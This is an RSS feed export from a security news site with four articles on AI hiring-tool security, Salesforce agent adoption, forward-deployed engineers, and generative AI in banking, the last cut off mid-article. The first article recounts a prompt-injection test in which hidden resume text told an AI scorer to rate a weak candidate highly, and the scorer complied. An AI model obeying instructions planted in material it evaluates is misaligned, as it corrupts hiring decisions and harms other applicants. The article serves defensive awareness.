<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/">
<channel>
<title><![CDATA[tsecurity.de - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=clean+architecture+vertical+slice%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Sat, 08 Aug 2026 00:18:25 +0200</lastBuildDate>
<pubDate>Sat, 08 Aug 2026 00:18:25 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 tsecurity.de - 📰 Alle Kategorien</copyright>
<managingEditor>tsecurity.de (tsecurity.de)</managingEditor>
<webMaster>tsecurity.de (tsecurity.de)</webMaster>
<image>
<url>https://tsecurity.de/templates/mydraft-basis-isharestuff-com/media/logo.png</url>
<title><![CDATA[tsecurity.de - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=clean+architecture+vertical+slice%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/alle-kategorien.xml?q=clean+architecture+vertical+slice%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Your AI hiring tool isn’t an HR problem. It’s a security one]]></title>
<description><![CDATA[For years, applicant tracking systems and recruiting platforms were treated as HR technology: Important for workflow, efficiency, compliance and candidate experience, but rarely viewed as core security infrastructure. That assumption no longer holds. Once AI begins reading resumes, scoring candid...]]></description>
<link>https://tsecurity.de/de/3710292/it-security-nachrichten/your-ai-hiring-tool-isnt-an-hr-problem-its-a-security-one/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710292/it-security-nachrichten/your-ai-hiring-tool-isnt-an-hr-problem-its-a-security-one/</guid>
<pubDate>Fri, 07 Aug 2026 23:48:04 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For years, applicant tracking systems and recruiting platforms were treated as HR technology: Important for workflow, efficiency, compliance and candidate experience, but rarely viewed as core security infrastructure. That assumption no longer holds. Once AI begins reading resumes, scoring candidates, conducting interviews, ranking applicants and influencing who moves forward, the hiring platform stops being a passive system of record. It becomes a decision system.</p>



<p class="wp-block-paragraph">And any system that accepts public input, processes sensitive data and influences business decisions belongs inside the security conversation.</p>



<p class="wp-block-paragraph">I learned this during an AI hiring platform rollout that never made it to production. The vendor was established, the product had a strong market reputation and the AI feature looked attractive: Upload a resume, compare it to a job description and return a neat percentage match. For recruiters, it promised speed. For executives, it promised modernization.</p>



<p class="wp-block-paragraph">Before moving real candidate data into the system, I tested it with synthetic resumes. One weak resume came back with a surprisingly strong match. The reason was not hidden in the candidate’s experience. It was hidden in the text. The resume contained language instructing the AI to treat the candidate as an excellent fit, and the system appeared to follow that instruction instead of evaluating the resume on merit.</p>



<p class="wp-block-paragraph">That changed the question from “Does the tool improve productivity?” to “Can the person being evaluated influence the evaluation itself?”</p>



<p class="wp-block-paragraph">That is a security question.</p>



<h2 class="wp-block-heading">The trust boundary has moved</h2>



<p class="wp-block-paragraph">CIOs do not need to become recruiting experts. They only need to look at the mechanics.</p>



<p class="wp-block-paragraph">An anonymous user submits content into an enterprise system. That content is processed by software. The software then produces an output that can influence a business decision. In every other environment, security teams know what to call that: untrusted input crossing a trust boundary.</p>



<p class="wp-block-paragraph">The difference is that in hiring, the input looks harmless. It is a resume, a cover letter, a chatbot reply or a spoken answer in an AI-led interview. But once AI reads that content and treats it as instruction, the harmless-looking input becomes part of the system’s control surface.</p>



<p class="wp-block-paragraph">That is why prompt injection matters in hiring. It is not just an AI oddity or a model behavior issue. It is the same category of failure enterprises have spent decades trying to prevent: User-controlled input changing what the system does. <a href="https://genai.owasp.org/llmrisk/llm01-prompt-injection/">OWASP lists prompt injection as the first risk in its Top 10 for LLM applications</a>, describing it as a case where user prompts alter a model’s behavior or output in unintended ways.</p>



<p class="wp-block-paragraph">In hiring, the implication is direct: A candidate may be able to manipulate the score, ranking or interview assessment that determines whether a human ever sees them.</p>



<h2 class="wp-block-heading">The business impact is not theoretical</h2>



<p class="wp-block-paragraph">The obvious risk is that an unqualified candidate moves forward. But the impact is broader.</p>



<p class="wp-block-paragraph">First, decision quality degrades. Hiring teams adopt AI scoring because they believe it improves signal. If the score can be manipulated, the business is not gaining signal; it is gaining false confidence. Recruiters may spend time on candidates who gamed the system while stronger candidates are buried lower in the queue. A tool bought to reduce friction can quietly create more of it.</p>



<p class="wp-block-paragraph">Second, cost increases under the appearance of efficiency. Every false positive consumes recruiter time, hiring-manager attention, interview slots and opportunity cost. A small weakness in screening integrity can become a measurable operational drag across open roles.</p>



<p class="wp-block-paragraph">Third, trust suffers. Candidates already question whether AI hiring tools are fair, explainable or accurate. If it becomes clear that a screening system can be manipulated by hidden instructions or verbal prompting, the issue is no longer just security. It becomes reputational. Strong candidates may lose confidence in the process, and employers may have to defend decisions made by systems they did not fully understand.</p>



<p class="wp-block-paragraph">Fourth, sensitive data exposure becomes harder to contain. Recruiting systems hold names, addresses, work histories, education histories, compensation details, work authorization information and sometimes accommodation or demographic data. <a href="https://csrc.nist.gov/pubs/sp/800/122/final">NIST guidance on personally identifiable information</a> includes employment information as linkable personal data that must be protected from inappropriate access, use and disclosure. Yet hiring platforms often receive less security scrutiny than systems holding customer or financial data.</p>



<p class="wp-block-paragraph">That mismatch is dangerous: High-value data, public-facing workflows and increasing automation.</p>



<p class="wp-block-paragraph"><a href="https://www.csoonline.com/article/4020919/mcdonalds-ai-hiring-tools-password-123456-exposes-data-of-64m-applicants.html">The 2025 McHire incident</a> should have made this impossible to ignore. Researchers reported that weaknesses in McDonald’s AI hiring platform, including default credentials and an access-control flaw, exposed applicant data at large scale before the issue was patched. The lesson for CIOs is not merely that a weak password was used. The lesson is that AI hiring systems can ship with basic, preventable security failures while still being treated as HR tools rather than enterprise risk surfaces.</p>



<h2 class="wp-block-heading">Vendor reputation does not transfer to every AI feature</h2>



<p class="wp-block-paragraph">One reason this risk slips through is that buyers often trust the platform brand. Mature vendors may have strong security programs, enterprise customers, compliance documentation and procurement-friendly answers.</p>



<p class="wp-block-paragraph">But AI features can change the architecture of risk.</p>



<p class="wp-block-paragraph">A platform that was safe as a workflow tool may behave very differently once it adds resume scoring, interview grading, chatbot screening or automated ranking. The new feature may introduce new inputs, new model behavior, new data flows, new third-party dependencies and new decision points. In practical terms, the attack surface has changed.</p>



<p class="wp-block-paragraph">CIOs should not allow AI features to inherit trust automatically from the legacy platform around them. When a vendor adds AI, the enterprise should reassess the feature as if it were a new product. That does not mean slowing innovation for bureaucracy. It means AI-enabled decision-making carries different failure modes from ordinary workflow automation.</p>



<h2 class="wp-block-heading">The ownership gap is the real vulnerability</h2>



<p class="wp-block-paragraph">The biggest risk may not be the model. It may be the ownership gap.</p>



<p class="wp-block-paragraph">Talent acquisition may buy the tool. HR operations may configure it. The vendor may guide implementation. Procurement and legal may approve the contract. But who owns the security of the candidate-facing AI layer?</p>



<p class="wp-block-paragraph">In many organizations, the honest answer is unclear.</p>



<p class="wp-block-paragraph">That ambiguity is where risk grows. Recruiting technology sits at the intersection of public input, sensitive data, third-party software, automated decision support and brand trust. That is exactly the kind of environment that needs named security ownership, asset inventory, vendor review, access-control testing, logging and incident-response planning.</p>



<p class="wp-block-paragraph">If the hiring stack is not in the security inventory, the organization is already making an assumption it may later regret.</p>



<h2 class="wp-block-heading">What CIOs should require now</h2>



<p class="wp-block-paragraph">The fix is not exotic. It is applying existing security discipline to a surface that has been underestimated.</p>



<p class="wp-block-paragraph">Treat every candidate submission as untrusted input. Resumes, cover letters, chatbot responses, interview transcripts and spoken answers should be handled as attacker-controllable content. If AI processes it, the system must separate content from instruction.</p>



<p class="wp-block-paragraph">Reassess vendors when AI features are introduced. A prior security review should not be treated as permanent approval for new AI capabilities. Ask what changed in the architecture, what data the model sees, what actions it can influence and how manipulation attempts are detected.</p>



<p class="wp-block-paragraph">Ask AI-specific questions before signing. Can candidate-provided content alter scoring? Are hidden instructions filtered or ignored? Is there human review before AI output influences a decision? Can the vendor produce testing evidence for prompt injection, access control and data exposure risks?</p>



<p class="wp-block-paragraph">Assign ownership. HR can own the process, but security must own the risk model. AI hiring systems should be included in third-party risk management, application security reviews, access governance, monitoring and incident response planning.</p>



<p class="wp-block-paragraph">Measure business impact, not just AI adoption. The goal is not to say the recruiting function uses AI. The goal is to improve hiring speed, quality, fairness and cost without creating new risk. If the system cannot protect decision integrity, the business case is weaker than it appears.</p>



<h2 class="wp-block-heading">The hiring platform is now part of the enterprise attack surface</h2>



<p class="wp-block-paragraph">AI has turned the careers page into more than a front door for applicants. It is now a public input channel feeding systems that store sensitive data and influence workforce decisions.</p>



<p class="wp-block-paragraph">That makes it a CIO concern.</p>



<p class="wp-block-paragraph">The next failure in AI hiring may not look like a traditional breach at first. It may look like bad rankings, manipulated scores, unexplainable decisions, wasted recruiter time or a candidate process no one trusts. But underneath those symptoms is a familiar security problem: A system trusted input it should have treated as hostile.</p>



<p class="wp-block-paragraph">Enterprises have hardened payment systems, customer portals, APIs and employee applications around that lesson. Hiring deserves the same treatment.</p>



<p class="wp-block-paragraph">AI hiring is not just an HR transformation. It is a security boundary. And it is time CIOs treated it like one.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic AI workforce is more than doubling year on year, says Salesforce]]></title>
<description><![CDATA[Salesforce customers more than doubled their agentic workforces year on year, according to the company’s second annual Agentic Enterprise Index, which looks at trends in AI agent development and deployment over the past five quarters.



It compiled data from customers who had activated agents in...]]></description>
<link>https://tsecurity.de/de/3710286/it-security-nachrichten/agentic-ai-workforce-is-more-than-doubling-year-on-year-says-salesforce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710286/it-security-nachrichten/agentic-ai-workforce-is-more-than-doubling-year-on-year-says-salesforce/</guid>
<pubDate>Fri, 07 Aug 2026 23:48:03 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Salesforce customers more than doubled their agentic workforces year on year, according to the company’s second annual <a href="https://www.salesforce.com/agentforce/agentic-enterprise-index/" target="_blank" rel="noreferrer noopener">Agentic Enterprise Index</a>, which looks at trends in AI agent development and deployment over the past five quarters.</p>



<p class="wp-block-paragraph">It compiled data from customers who had activated agents in production every month of the analysis period to determine how their use of the technology has evolved between February 2025 and April 2026, as well as incorporating data from May 2026 Salesforce research studies.</p>



<p class="wp-block-paragraph">It found that businesses grew their agentic workforces from an average of five agents in February 2025 to 13 by April 2026, a 7% compound monthly growth rate (CMGR). In April 2026, it only took an average of 1.9 days to deploy an agent into production, a 53% decrease since the beginning of the report period.</p>



<p class="wp-block-paragraph">Not only were agents deployed more quickly, they have been progressively taking on more work once in use; over the 15 months, the average number of actions per account had a CMGR of 31%.</p>



<p class="wp-block-paragraph">“These agents are expanding beyond their initial scope to really become cross-functional,” said <a href="https://www.linkedin.com/in/caila-schwartz/" target="_blank" rel="noreferrer noopener">Caila Schwartz</a>, Salesforce’s head of agentic commerce insights, during a media briefing.</p>



<p class="wp-block-paragraph">Salesforce has attempted to measure how much work agents perform, rather than how many tokens they consume, creating its own <a href="https://www.cio.com/article/4138622/awu-by-salesforce-a-shiny-new-metric-that-tells-cios-little-of-value.html">Agentic Work Unit (AWU) metric</a>, although analysts have criticized the measure as being unrelated to business outcomes. Nevertheless, Salesforce said that as of April, Agentforce agents had performed 734 million AWUs, a number growing at about 15% each month.</p>



<p class="wp-block-paragraph">The research also showed that agents are acting across multiple cloud domains which, the company said, “underscores the practical necessity of a headless architecture. By decoupling the agent’s logic from traditional front-end user interfaces, agents can process tasks, execute actions, and trigger workflows anywhere.”</p>



<p class="wp-block-paragraph">Within the company, Salesforce itself has seen explosive growth in AI agent use, said <a href="https://www.linkedin.com/in/joseph-inzerillo-b917791/" target="_blank" rel="noreferrer noopener">Joe Inzerillo</a>, president of enterprise &amp; AI technology at Salesforce, with a threefold increase in sessions between February 2025 and April 2026. He said that the AI agent in Slack, Slackbot, saves the average employee five hours per week, with 83% of the company having adopted it.</p>



<p class="wp-block-paragraph">But Schwartz pointed out that different industries are approaching agentic AI in different ways, some more sophisticated than others. To measure that, Salesforce developed a Sophistication Index, a five-point scale scoring the cognitive complexity of an agent’s actions. Levels 1- 3  are assigned to tasks such as record lookups, drafting emails, or summarizing documents, while levels 4 and 5 include more complex functions such as updating database fields.</p>



<p class="wp-block-paragraph">The data showed that manufacturing, financial services, and healthcare and life sciences have built more sophisticated agent networks than what it called traditional AI frontrunners such as technology and retail.</p>



<p class="wp-block-paragraph">However, Inzerillo said, the most common use case industry wide, and the best place to start, is the service use case, which provides “far and away the best ROI to start with.”</p>



<p class="wp-block-paragraph">He also noted that, as people have become more conscious of what agents can do, they are asking agents to perform tasks, rather than simply answer questions.</p>



<p class="wp-block-paragraph">“Now what you’re starting to see people do is very action oriented. So instead of asking ’how do I file a form to request my vacation’ from our employee agent, they’re telling the employee agent, ‘hey I’m taking a vacation, you need to enter this form for me, and here’s the details,’” he said, adding that this bias towards action represents the evolution of agentic use.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[There are two completely different roles called ‘FDE’]]></title>
<description><![CDATA[There’s something very attractive about saying “we embed very closely with our customers and just figure it out with them”, especially since the company that started “forward deploying engineers” is growing 84% with $5B+ revenue. But “forward deployed engineer” is a vague term and means different...]]></description>
<link>https://tsecurity.de/de/3710288/it-security-nachrichten/there-are-two-completely-different-roles-called-fde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710288/it-security-nachrichten/there-are-two-completely-different-roles-called-fde/</guid>
<pubDate>Fri, 07 Aug 2026 23:48:03 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">There’s something very attractive about saying “we embed very closely with our customers and just figure it out with them”, especially since the company that started “forward deploying engineers” is growing <a href="https://investors.palantir.com/files/2026%20Q1%20PLTR%2010-Q.pdf">84% with $5B+ revenue</a>. But “<a href="https://en.wikipedia.org/wiki/Forward_Deployed_Engineer#cite_note-1">forward deployed engineer</a>” is a vague term and means different things depending on the business you’re running.</p>



<p class="wp-block-paragraph">I spent almost 5 years at Palantir as a forward-deployed software engineer, and Palantir’s version of an “FDE” does not make sense for most companies I now meet as an early-stage VC. Depending on the type of business you’re building, this role could broadly mean one of two things: “the product builder” or “the platform operator.” Clearly defining which bucket you fall into will make it easier to hire for this role and run your FDE org.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/nature-of-work-vs-product-leverage.png?w=1024" alt="Figure: Nature of work vs. product leverage." class="wp-image-4206317" width="1024" height="578" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>



<h2 class="wp-block-heading">The product builder: The OG Palantir version</h2>



<p class="wp-block-paragraph">The north star is: do whatever it takes to actually solve the user’s problem. FDEs are not just responsible for making the platform work, but also discovering what to build and building it (actually creating software) in service of the customer.</p>



<h2 class="wp-block-heading">The platform operator: Solutions + technical customer success</h2>



<p class="wp-block-paragraph">The north star is: make the product work for the customer – deploy and operationalize it. This is what most startups today really mean when they want FDEs. FDEs here configure the core platform, manage account relationships and drive adoption. This is not new – companies have always had solutions engineers, sales engineers, customer success etc., although the work looks different as FDEs are increasingly building prototypes, configuring evals and building MCPs.</p>



<h2 class="wp-block-heading">Which FDE is right for you</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/customer-size.png?w=1024" alt="Figure: Customer size." class="wp-image-4206316" width="1024" height="457" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>



<p class="wp-block-paragraph">For most situations, hiring product builder FDEs is a mistake.</p>



<p class="wp-block-paragraph">At scale, the FDEs should be the platform operator. It’s hard to have FDEs build and maintain highly custom product features, especially as the company scales. Over time, the custom product surface area distracts from building the core product, even though AI coding tools make it easy to ship new features quickly and maintain them.</p>



<p class="wp-block-paragraph">Many fast-growing AI startups recognize these constraints and structure the FDE role more like the platform operator. This also allows them to have 5-10 accounts per FDE, which is a much higher ratio than Palantir had (at least in 2023). Even the Palantir FDE role has evolved to look more like the platform operator.</p>



<p class="wp-block-paragraph">There are, however, situations when your FDEs should be the product builder archetype.</p>



<h3 class="wp-block-heading">1. You have very large customers (F500 scale)</h3>



<p class="wp-block-paragraph"><strong>Technical complexity</strong>: Large customers have complex environments with legacy infrastructure that often requires “out-of-platform” engineering work. I often encountered bespoke data infrastructure, privacy requirements, etc. at various Palantir customers that required me to build “out-of-platform” connectors, UIs and backends.</p>



<p class="wp-block-paragraph"><strong>Organizational inertia and trust</strong>: Serving large enterprises is about building trust. In short time periods, overfitting product to a specific user/workflow is often what delivers the most value, builds trust and helps organizations get over the inertia of moving away from Excel and legacy software tools that are part of their day-to-day workflow. For AI-native startups, it’s arguably even more important to invest in doing “unscalable” development with engineering boots on the ground, as it helps solidify your right to exist and eventually expand the customer relationship.</p>



<h3 class="wp-block-heading">2. You have many ICPs and workflows</h3>



<p class="wp-block-paragraph">If you have a broad range of ICPs and workflows that you serve, your product probably is not walk-up usable on day 1 of deployment. The short-term hacky things that product builder FDEs build to make the product work for these heterogeneous users/workflows will help you shape the product long-term.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/overfit-products.png?w=1024" alt='Figure: "Overfit" products.' class="wp-image-4206313" width="1024" height="570" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>



<p class="wp-block-paragraph">Note: see Palantir Foundry’s architecture <a href="https://www.palantir.com/assets/xrfr7uokpv1b/mhoyY4c8vdVlJhulDStk2/a7340768109c8e8d79d00b4cb99d8e70/Whitepaper_-_Foundry_2022.pdf">here</a>.</p>



<p class="wp-block-paragraph">This was a big reason why Palantir FDEs were more like product builders (and are still able to – see the <a href="https://jobs.lever.co/palantir/dab396d4-2f14-4796-aac0-0d82883dccf0">Forward Deployed Software Engineer job profiles</a> as an example). The vision for Foundry was to be the operating system for an enterprise’s critical decisions – inherently multiple industries, users and workflows. A lot of FDE-led development showed that solving many of these use cases required complex data integrations, which led to the early versions of Foundry being best-suited for complex data integrations and building a customer’s “<a href="https://blog.palantir.com/ontology-finding-meaning-in-data-palantir-rfx-blog-series-1-399bd1a5971b">Ontology</a>”. Similarly, FDEs like myself built custom frontend applications for fraud analysis, pricing, etc. As certain patterns of what these applications required became more clear, they were centralized into an application-layer product.</p>



<h2 class="wp-block-heading">Who you should hire</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/who-you-should-hire.png?w=1024" alt="Figure: Who you hire." class="wp-image-4206314" width="1024" height="464" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/why-hire.png?w=1024" alt="Figure: Why hire one vs. the other." class="wp-image-4206315" width="1024" height="456" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>



<p class="wp-block-paragraph"><strong>Platform operator</strong>: There is a much broader set of people you could hire, testing for technical fluency (e.g., being good at data analysis, complex Excel work, even SQL), product intuition and an inclination to build customer relationships. Backgrounds like technical customer success, solutions engineering, software engineering, product management and consulting are all strong fits.</p>



<p class="wp-block-paragraph"><strong>Product builder</strong>: You want candidates that are high ownership and missionary software engineers, or technical PMs who want to ship products themselves.</p>



<p class="wp-block-paragraph">Hiring for these profiles, especially product builders, is hard. It’s worth calling out two things that helped Palantir hire software engineers into what might be considered a less sexy role.</p>



<ol start="1" class="wp-block-list">
<li><strong>Culture of building at the edge</strong>: Strong engineers are motivated to build things. Palantir gave FDEs a lot of ownership to build products, which is why much of the core product leadership was former FDEs.</li>



<li><strong>Cult built around mission</strong>: Internally, there was a cult-like devotion to the mission. Everyone always talked about why outcomes were far more important than software, and why most companies building tools had it wrong. I’ve never been at a company where people feel so closely bonded around a mission.</li>
</ol>



<p class="wp-block-paragraph">As founders building AI startups think about hiring FDEs, it’s worth being specific about your culture and asking: Am I just hiring people to support development teams, or am I hiring people to shape and build product? It’s hard to get software engineers (even today) to be excited about an FDE role that might just be technical customer success.</p>



<h2 class="wp-block-heading">What FDEs should be doing (regardless of archetype)</h2>



<p class="wp-block-paragraph">You’ve hired the right people. How do you best leverage your team of FDEs?</p>



<p class="wp-block-paragraph">FDEs were Palantir’s way of delivering outcomes rather than tools. AI-native startups can take this much further and FDEs can help in a few unique ways by leveraging their proximity to customers.</p>



<ol start="1" class="wp-block-list">
<li><strong>Find the most critical workflows</strong>: As AI lowers the cost of producing software, companies will face a lot more competition. FDEs at AI startups should be constantly finding ways to serve the most critical workflows for a customer and paying attention to how customers do work across newer and legacy tools. For example, FDEs at Harvey should pay attention to which workflows are in Westlaw, which ones are moving to ChatGPT/Claude, and how the Harvey product can stay ahead.</li>



<li><strong>Build around nondeterminism</strong>: In more regulated environments, FDEs should be hyper-focused on making products reliable for specific use cases <a href="https://www.anthropic.com/engineering/demystifying-evals-for-ai-agents">using evals</a> and configs. Previously, product reliability lived with product and support. As companies provide outcomes instead of tools, configuring products appropriately and managing evals shifts towards FDE teams.</li>
</ol>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Beyond chatbots: How embedded GenAI is transforming banking application development]]></title>
<description><![CDATA[Business application development is entering a new operating model. The traditional approach of gathering requirements, designing screens, writing services, integrating systems, testing, fixing defects and preparing release documentation still exists, but it is no longer sufficient for enterprise...]]></description>
<link>https://tsecurity.de/de/3710290/it-security-nachrichten/beyond-chatbots-how-embedded-genai-is-transforming-banking-application-development/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710290/it-security-nachrichten/beyond-chatbots-how-embedded-genai-is-transforming-banking-application-development/</guid>
<pubDate>Fri, 07 Aug 2026 23:48:03 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Business application development is entering a new operating model. The traditional approach of gathering requirements, designing screens, writing services, integrating systems, testing, fixing defects and preparing release documentation still exists, but it is no longer sufficient for enterprises that need speed, traceability, resilience and regulatory confidence at the same time. Hyperautomation brings a broader discipline to this challenge. It combines workflow orchestration, intelligent document processing, robotic automation, API-led integration, process mining, test automation, observability and artificial intelligence into a connected delivery fabric. With embedded Generative AI, this fabric becomes more adaptive because applications can interpret natural language, summarize complex data, generate explanations, detect exceptions and support decision workflows rather than merely execute predefined rules.</p>



<p class="wp-block-paragraph">In banking, this shift is especially meaningful. Banks operate across dense application landscapes: trade reporting platforms, wealth management portals, core banking systems, investment banking applications, digital compliance engines, reconciliation utilities, operational dashboards, audit repositories and daily, weekly and monthly reporting platforms. Each of these areas has its own data models, control points, integration patterns, validation rules, exception paths and regulatory obligations. Hyperautomation does not replace engineering discipline; it strengthens it by making business intent, technical execution, control evidence and continuous improvement part of the same lifecycle.</p>



<h2 class="wp-block-heading">From automation to hyperautomation in banking applications</h2>



<p class="wp-block-paragraph">Automation usually addresses a specific task: moving data from one system to another, generating a report, running a batch job or validating a transaction against a rule. Hyperautomation goes further. It looks at the complete business outcome and asks how the entire chain can be streamlined, governed, observed and improved. For example, a trade reporting process may begin with transaction capture, enrich the trade with reference data, validate regulatory fields, identify breaks, generate a submission file, transmit it to a regulator or trade repository, monitor acknowledgements and preserve audit evidence. A narrow automation script may accelerate one step, but a <a href="https://www.gartner.com/en/documents/6454507">hyperautomated design</a> coordinates the complete flow, including exception handling and evidence generation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/figure-Figure-automation-vs-hyperautomation.png?w=1024" alt="Figure: Automation vs. hyperautomation." class="wp-image-4206308" width="1024" height="775" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Magesh Kasthuri</p></div>



<p class="wp-block-paragraph"><strong>Figure: Automation vs. hyperautomation</strong></p>



<p class="wp-block-paragraph">Embedded Generative AI adds a <a href="https://assets.ctfassets.net/5965pury2lcm/65QHMnfLGaRJzJ0sX5982o/520b5f0a9745aecc8730c645994e3a3b/Forrester_Study_-_AI_And_The_Next_Generation_of_Software_Testing.pdf">new layer of intelligence</a>. Instead of forcing every user interaction into rigid screens and codes, business applications can accept natural language prompts, interpret document content, summarize cases, generate draft responses, explain anomalies, produce test scenarios and create release notes. In a banking environment, this intelligence must be carefully bounded. Every AI-assisted action should be traceable, explainable, reviewable and aligned with data privacy, model risk, information security and regulatory expectations. The goal is not uncontrolled autonomy; the goal is governed acceleration.</p>



<h2 class="wp-block-heading">Banking application components suitable for hyperautomation</h2>



<p class="wp-block-paragraph">A modern banking application is rarely a single monolithic system. It is a composition of business capabilities, integration services, workflow engines, data pipelines, user experience layers, analytics models, control dashboards and audit stores. Hyperautomation can accelerate the development and integration of these components by turning repetitive engineering work into <a href="https://www.everestgrp.com/report/egr-2024-31-v-6318/">reusable patterns</a> and by embedding intelligence directly into business processes.</p>



<ul class="wp-block-list">
<li><strong>Trade reporting applications:</strong> Generative AI can help map trade attributes to regulatory fields, explain validation failures, summarize rejected submissions and generate test cases for reporting scenarios. Hyperautomation can orchestrate enrichment, validation, submission, acknowledgement tracking and evidence archival.</li>



<li><strong>Wealth management platforms:</strong> Advisors can use embedded AI to summarize client portfolios, generate suitability narratives, identify missing documents and prepare personalized investment review notes. Automation can coordinate onboarding, risk profiling, document verification, portfolio rebalancing workflows and client communication approvals.</li>



<li><strong>Core banking applications:</strong> Account opening, loan servicing, deposits, payments, interest calculations and customer maintenance can benefit from automated validations, intelligent forms, workflow routing and natural language assistance for operations teams. AI can explain account events or transaction exceptions in plain language.</li>



<li><strong>Investment banking systems:</strong> Deal pipelines, research workflows, underwriting processes, trade lifecycle functions and risk calculations require strong coordination across front-office, middle-office and back-office platforms. Hyperautomation can standardize approvals, documentation, exception resolution and control evidence across these stages.</li>



<li><strong>Digital compliance applications:</strong> Compliance teams can use AI to summarize policy obligations, compare regulatory changes with internal controls, classify alerts, draft investigation notes and produce evidence packs. Automation ensures routing, approvals, segregation of duties, audit trails and regulatory reporting timelines are consistently enforced.</li>



<li><strong>Reconciliation platforms:</strong> AI can assist in matching narratives, explaining breaks, clustering exception patterns and suggesting resolution actions. Hyperautomation can pull data from ledgers, statements, payment processors, trading systems and data warehouses, then route unresolved breaks to the right teams.</li>



<li><strong>Reporting and audit applications:</strong> Daily, weekly and monthly reports can be generated through controlled data pipelines, automated quality checks, narrative generation, variance explanations and approval workflows. Audit applications can preserve lineage, approvals, source extracts, model outputs and control attestations.</li>
</ul>



<h2 class="wp-block-heading">Embedded generative AI as an application capability</h2>



<p class="wp-block-paragraph">Embedding Generative AI into business applications should be treated as an architectural capability, not as a decorative chatbot. A banking application may use AI for search, summarization, reasoning support, content generation, code generation, policy interpretation or anomaly explanation. Each use case requires clear boundaries. The application must know which data the model can access, which actions require approval, what evidence must be captured and where deterministic controls must override probabilistic <a href="https://www.idc.com/resource-center/generative-ai/">suggestions</a>.</p>



<p class="wp-block-paragraph">For example, in trade reporting, an embedded AI assistant can explain why a transaction failed validation and suggest likely fields to review. However, the final correction should pass through rule-based validations, maker-checker approval and audit logging. In wealth management, AI may draft a client review note based on portfolio movements and risk profile, but the advisor must verify suitability, disclosures and final communication. In reconciliation, AI can propose likely matches or categorize break reasons, while the system preserves the original data, confidence score, reviewer action and final resolution path.</p>



<h2 class="wp-block-heading">Hyperautomating the product development lifecycle</h2>



